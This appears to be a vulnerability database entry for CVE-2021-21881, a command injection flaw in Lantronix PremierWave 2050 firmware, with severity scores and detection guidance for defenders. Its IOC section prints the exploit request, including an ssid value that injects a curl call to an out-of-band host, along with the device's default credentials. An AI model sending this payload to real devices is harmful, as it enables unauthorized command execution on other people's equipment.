cbcvebase.
CVE-2021-21881
published 2021-12-22

CVE-2021-21881: An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A…

PriorityP186critical9.9CVSS 3.1
AVNACLPRLUINSCCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
37.06%
98.3th percentile
An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

Affected

1 ranges
VendorProductVersion rangeFixed in
lantronixpremierwave_2050_firmware

Detection & IOCsextracted from sources · hover to see the quote

urlPOST / HTTP/1.1 with ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #
commandssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #
otherajax=WLANScanSSID
  • Detect exploitation attempts by monitoring POST requests to the root path (/) containing the 'ajax=WLANScanSSID' parameter combined with shell metacharacters in the 'ssid' field (e.g., single quotes, semicolons, backticks).
  • The exploit uses HTTP Basic Authentication with hardcoded credentials. Monitor for Base64 values 'dXNlcjp1c2Vy' (user:user) and 'YWRtaW46UEFTUw==' (admin:PASS) in Authorization headers targeting Lantronix PremierWave devices.
  • The vulnerability is triggered via the Web Manager Wireless Network Scanner endpoint. Look for POST requests with Content-Type: application/x-www-form-urlencoded containing 'Scan=Scan' and a malformed 'ssid' parameter with OS command injection payloads.
  • Out-of-band detection: successful exploitation causes the device to issue an outbound HTTP request (e.g., via curl) with a randomized User-Agent header. Monitor for unexpected outbound HTTP connections from Lantronix PremierWave 2050 devices.
  • The nuclei template uses stop-at-first-match with two credential pairs, indicating attackers may try both 'user:user' and 'admin:PASS' sequentially. Alert on multiple rapid authenticated POST requests to the same Lantronix device root path.
  • ·Exploitation requires prior authentication. The template tests two hardcoded credential pairs (user:user and admin:PASS), but real-world attackers may use other valid credentials. Detection rules should not rely solely on these specific credential values.
  • ·The User-Agent value used in the injected curl command is randomized per scan (rand_base(6)), so it cannot be used as a static IOC for network detection without dynamic correlation.
  • ·The vulnerability is specific to Lantronix PremierWave 2050 firmware version 8.9.0.0R4. Detection rules should be scoped to this CPE to avoid false positives.

CVSS provenance

nvdv3.19.9CRITICALCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvdv3.09.9CRITICALCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck9.9CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.